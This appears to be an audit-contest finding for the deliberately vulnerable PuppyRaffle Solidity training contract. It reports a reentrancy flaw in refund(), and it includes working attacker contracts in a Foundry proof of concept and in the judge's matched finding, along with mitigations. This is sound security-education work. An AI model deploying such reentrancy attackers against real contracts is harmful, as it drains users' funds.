Puppy Raffle

AI First Flight #1

Beginner FriendlyFoundrySolidityNFT

EXP

View results

Previous Next

Submission Details

Severity: high

Valid

Reentrancy in PuppyRaffle::refund() allows draining entire contract

quangviet910

Root + Impact

Description

The `refund()` function in `PuppyRaffle.sol` violates the Checks-Effects-Interactions (CEI) pattern by making an external call to send ETH before updating the contract state. The function uses `sendValue()` which forwards all available gas, allowing the recipient's `receive()` or `fallback()` function to call back into `refund()` recursively.
Since the `players[playerIndex]` is only set to `address(0)` after the external call, an attacker can repeatedly drain funds by re-entering the function before their player slot is cleared.

function refund(uint256 playerIndex) public {

address playerAddress = players[playerIndex];

require(playerAddress == msg.sender, "PuppyRaffle: Only the player can refund");

require(playerAddress != address(0), "PuppyRaffle: Player already refunded, or is not active");

payable(msg.sender).sendValue(entranceFee); @> interact with external contracts before update states

players[playerIndex] = address(0); @> update contract state only after finishing interaction with external contracts

emit RaffleRefunded(playerAddress);

}

Risk

Likelihood:

Any player who enters the raffle can trigger this vulnerability at any time before the raffle ends
No special timing or conditions are needed, making exploitation trivial and guaranteed to succeed.

Impact:

Complete drainage of all contract funds results in 100% loss of all participant deposits

Proof of Concept

// SPDX-License-Identifier: MIT

pragma solidity ^0.7.6;

pragma experimental ABIEncoderV2;

import {Test, console} from "forge-std/Test.sol";

import {PuppyRaffle} from "../src/PuppyRaffle.sol";

contract PuppyRaffleTest is Test {

// existing code

function testReentrancy() public playersEntered {

// Attacker enters with 1 ETH and launches attack

address payable attacker = payable(new ReentrancyAttacker(address(puppyRaffle)));

vm.deal(address(attacker), entranceFee);

uint256 raffleBalance = address(puppyRaffle).balance;

uint256 attackerBalance = address(attacker).balance;

console.log("Contract balance before attack: %d", raffleBalance);

console.log("Attacker balance before attack: %d", attackerBalance);

ReentrancyAttacker(attacker).attack{value: entranceFee}();

// Check results

raffleBalance = address(puppyRaffle).balance;

attackerBalance = address(attacker).balance;

console.log("Contract balance after attack: %d", raffleBalance);

console.log("Attacker balance after attack: %d", attackerBalance);

// Verify the attack drained the contract

assertEq(raffleBalance, 0, "Contract should be drained");

}

contract ReentrancyAttacker {

PuppyRaffle public puppyRaffle;

uint256 public attackerIndex;

constructor(address _puppyRaffle) {

puppyRaffle = PuppyRaffle(_puppyRaffle);

}

function attack() external payable {

// Step 1: Enter the raffle with 1 ETH

address[] memory players = new address[](1);

players[0] = address(this);

puppyRaffle.enterRaffle{value: msg.value}(players);

// Step 2: Get our player index

attackerIndex = puppyRaffle.getActivePlayerIndex(address(this));

// Step 3: Trigger reentrancy by requesting refund

puppyRaffle.refund(attackerIndex);

}

// Reentrancy hook - called when contract receives ETH from refund

receive() external payable {

// Continue attacking while contract has funds and we haven't exceeded gas limits

if (address(puppyRaffle).balance >= puppyRaffle.entranceFee()) {

puppyRaffle.refund(attackerIndex);

}

function withdraw() external {

payable(msg.sender).transfer(address(this).balance);

}

Run the test using below command, we can see all funds in PuppyRaffle is drained and transfered to the attacker.

forge test --mt testReentrancy

Recommended Mitigation

Follow Checks-Effects-Interactions pattern or add Reentrancy guard.

Checks-Effects-Interactions

function refund(uint256 playerIndex) public {

address playerAddress = players[playerIndex];

require(playerAddress == msg.sender, "PuppyRaffle: Only the player can refund");

require(playerAddress != address(0), "PuppyRaffle: Player already refunded, or is not active");

+ // Update state BEFORE external call (CEI pattern)

+ players[playerIndex] = address(0);

+ emit RaffleRefunded(playerAddress);

payable(msg.sender).sendValue(entranceFee);

- players[playerIndex] = address(0);

- emit RaffleRefunded(playerAddress);

}

Reentrancy guard

import "@openzeppelin/contracts/security/ReentrancyGuard.sol";

contract PuppyRaffle is ERC721, Ownable, ReentrancyGuard {

function refund(uint256 playerIndex) public nonReentrant {

// ... existing code

}

Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 24 hours ago

Submission Judgement Published

Validated

Assigned finding tags:

[H-02] Reentrancy Vulnerability In refund() function

## Description The `PuppyRaffle::refund()` function doesn't have any mechanism to prevent a reentrancy attack and doesn't follow the Check-effects-interactions pattern ## Vulnerability Details ```javascript function refund(uint256 playerIndex) public { address playerAddress = players[playerIndex]; require(playerAddress == msg.sender, "PuppyRaffle: Only the player can refund"); require(playerAddress != address(0), "PuppyRaffle: Player already refunded, or is not active"); payable(msg.sender).sendValue(entranceFee); players[playerIndex] = address(0); emit RaffleRefunded(playerAddress); } ``` In the provided PuppyRaffle contract is potentially vulnerable to reentrancy attacks. This is because it first sends Ether to msg.sender and then updates the state of the contract.a malicious contract could re-enter the refund function before the state is updated. ## Impact If exploited, this vulnerability could allow a malicious contract to drain Ether from the PuppyRaffle contract, leading to loss of funds for the contract and its users. ```javascript PuppyRaffle.players (src/PuppyRaffle.sol#23) can be used in cross function reentrancies: - PuppyRaffle.enterRaffle(address[]) (src/PuppyRaffle.sol#79-92) - PuppyRaffle.getActivePlayerIndex(address) (src/PuppyRaffle.sol#110-117) - PuppyRaffle.players (src/PuppyRaffle.sol#23) - PuppyRaffle.refund(uint256) (src/PuppyRaffle.sol#96-105) - PuppyRaffle.selectWinner() (src/PuppyRaffle.sol#125-154) ``` ## POC <details> ```solidity // SPDX-License-Identifier: MIT pragma solidity ^0.7.6; import "./PuppyRaffle.sol"; contract AttackContract { PuppyRaffle public puppyRaffle; uint256 public receivedEther; constructor(PuppyRaffle _puppyRaffle) { puppyRaffle = _puppyRaffle; } function attack() public payable { require(msg.value > 0); // Create a dynamic array and push the sender's address address[] memory players = new address[](1); players[0] = address(this); puppyRaffle.enterRaffle{value: msg.value}(players); } fallback() external payable { if (address(puppyRaffle).balance >= msg.value) { receivedEther += msg.value; // Find the index of the sender's address uint256 playerIndex = puppyRaffle.getActivePlayerIndex(address(this)); if (playerIndex > 0) { // Refund the sender if they are in the raffle puppyRaffle.refund(playerIndex); } } } } ``` we create a malicious contract (AttackContract) that enters the raffle and then uses its fallback function to repeatedly call refund before the PuppyRaffle contract has a chance to update its state. </details> ## Recommendations To mitigate the reentrancy vulnerability, you should follow the Checks-Effects-Interactions pattern. This pattern suggests that you should make any state changes before calling external contracts or sending Ether. Here's how you can modify the refund function: ```javascript function refund(uint256 playerIndex) public { address playerAddress = players[playerIndex]; require(playerAddress == msg.sender, "PuppyRaffle: Only the player can refund"); require(playerAddress != address(0), "PuppyRaffle: Player already refunded, or is not active"); // Update the state before sending Ether players[playerIndex] = address(0); emit RaffleRefunded(playerAddress); // Now it's safe to send Ether (bool success, ) = payable(msg.sender).call{value: entranceFee}(""); require(success, "PuppyRaffle: Failed to refund"); } ``` This way, even if the msg.sender is a malicious contract that tries to re-enter the refund function, it will fail the require check because the player's address has already been set to address(0).Also we changed the event is emitted before the external call, and the external call is the last step in the function. This mitigates the risk of a reentrancy attack.

Rewards breakdown

This contest has a flat reward structure with the following payouts:

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being reviewed by our AI judge. Results will be available in a few minutes.

View all submissions

Rewards Distribution

The contest is complete and the rewards are being distributed.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!